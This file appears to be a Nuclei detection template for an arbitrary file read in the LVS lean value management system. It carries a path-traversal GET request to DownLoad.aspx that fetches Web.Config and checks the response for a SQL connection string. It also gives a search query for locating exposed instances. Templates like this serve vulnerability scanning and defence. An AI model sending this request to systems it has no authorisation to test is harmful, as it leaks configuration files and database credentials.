id: lvs-download-lfi

info:
  name: LVS DownLoad.aspx - Local File Inclusion (LFI)
  author: pussycat0x
  severity: high
  description: |
    LVS lean value management system DownLoad.aspx has an arbitrary file reading vulnerability.
  reference:
    - https://github.com/wy876/POC/blob/main/LVS%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FDownLoad.aspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md#lvs%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9Fdownloadaspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
  tags: lvs,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/Business/DownLoad.aspx?p=UploadFile/../Web.Config"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<configuration>'
          - '<appSettings>'
          - '<add key="SqlConnString"'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/ms-excel'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207ddbe287d182587f0436cd98cb06c90a79c6c67c42c66c694f93c40e4f8dda47022100ce2778e53102dd1b36a102752e33d5641fc45219936cc951ed94ae4950fb83a6:922c64590222798bb761d5b6d8e72950